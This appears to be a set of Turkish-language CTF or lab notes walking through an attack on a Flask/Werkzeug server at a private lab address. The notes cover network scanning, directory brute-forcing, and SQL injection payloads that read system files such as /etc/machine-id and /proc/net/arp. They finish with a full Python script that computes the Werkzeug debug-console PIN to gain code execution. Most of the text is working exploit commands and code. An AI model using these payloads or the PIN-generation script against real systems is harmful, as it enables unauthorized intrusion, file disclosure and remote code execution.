1. Şama Kendi Ipni öğren
ifconfig
Kendi Ip :192.168.238.129
2. Aşama karşı pcyi bul
nmap 192.168.238.0/24
sudo netdiscover -i eth0 -r 192.168.238.0/24
Hedef PC:192.168.238.131
3. Aşama açık portları tesbit et.
nmap -p- 192.168.238.131
4. Aşama url dizinin tesbiti
dirb http://192.168.238.131
dirb http://192.168.238.131:8000
5. Aşama açılan urlden siteyi incele
sayfa kaynağını incele
sql hatası ara
SAyfa başlığındaki adamı araşıtır.
http://192.168.238.131:8000/console
http://192.168.238.131:8000/download
http://192.168.238.131:8000/
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/werkzeug
6.Adım Dowload url bulma
http://192.168.238.131:8000/console bu kaynak kodundan
<a href="/download?id=1">
sonuç :
http://192.168.238.131:8000/download?id=1
7 adım sql enjecte adımı ile sona ' attık ve sqli sonladırdık aldığımız hatadan
yeni url bulduk
http://192.168.238.131:8000/download?id=1'
/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py
Kullanıcı adı: mcskidy olduğunu öğrendik
8. Adım web arastırmalardam sonra
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/werkzeug
içeriisndeki kodu al ve
nano pin.py içerisine kaydet ve pyhton ile çalıştır
9. Adım kodu editleme
Kullanıcı adı: mcskidy
probably_public_bits = [
'web3_user', # Kullanıcı adı = mcskidy
'flask.app', # Flask modülü adı
'Flask', # Flask sınıfının adı
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # Flask modülünün dosya yolu
= yeni url 7 adımdan => /home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py
]
9.1 Adım MAc id hackedecimal biçimde bulma
http://192.168.238.131:8000/download?id=-1' union select 'file:////proc/net/arp';--
gönder. gelen download'u açtık ve açılan sayfanın kaynak kodda Device verdi. aldığımız device
ismi ile "ens33" yeni bir url doldurduk.
sonuç:
http://192.168.238.131:8000/download?id=-1' union select 'file:////sys/class/net/ens33/address';--
gelen download'u açtık ve açılan sayfanın kaynak kodda mac adresini aldık
10 adım mac adresi hexedesimal çevirme
print(0xMAC) # aradakı : leri sil.
sonucu al.
private_bits = [
'279275995014060', # Cihazın MAC adresi buraya yapıştır.
'd4e6cb65d59544f3331ea0425dc555a1' # Sistem kimliği (/etc/machine-id dosyasından)
]
11. ADım site kimliği bulma (/machine-id) bulma
get_machine_id(), /etc/machine-id
http://192.168.238.131:8000/download?id=-1' union select 'file:////etc/machine-id';--
gelen download'u açtık ve açılan sayfanın kaynak kodda machine id adresini aldık
private_bits = [
'279275995014060', # Cihazın MAC adresi buraya yapıştır.
'd4e6cb65d59544f3331ea0425dc555a1' # Sistem kimliği > buraya yapıştır.
]
pyhtone koda h = hashlib.md5() burayı sha1 yap sonra siteden yine
/proc/self/cgroup komutu al enjecte et ve indir bak içine
burada app.service komutunual ve kopya macin idnin sonuna yapıştır.
CONSOLE_MODE = true,
EVALEX = true,
EVALEX_TRUSTED = true,
SECRET = "xV1eOSVKC3oM3WpAPXpz";
/home/mcskidy/.local/lib/python3.7/site-packages/MySQLdb/connections.py"
/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py
secret : xV1eOSVKC3oM3WpAPXpz
Kullanıcı adı: mcskidy
pin.py
import hashlib
from itertools import chain
probably_public_bits = [
'mcskidy',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'52243044290',# str(uuid.getnode()), /sys/class/net/ens33/address
'ee7c76250d01482e8320fef17f50ab64app.service'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
print.py
print(0x000c29ed97c2)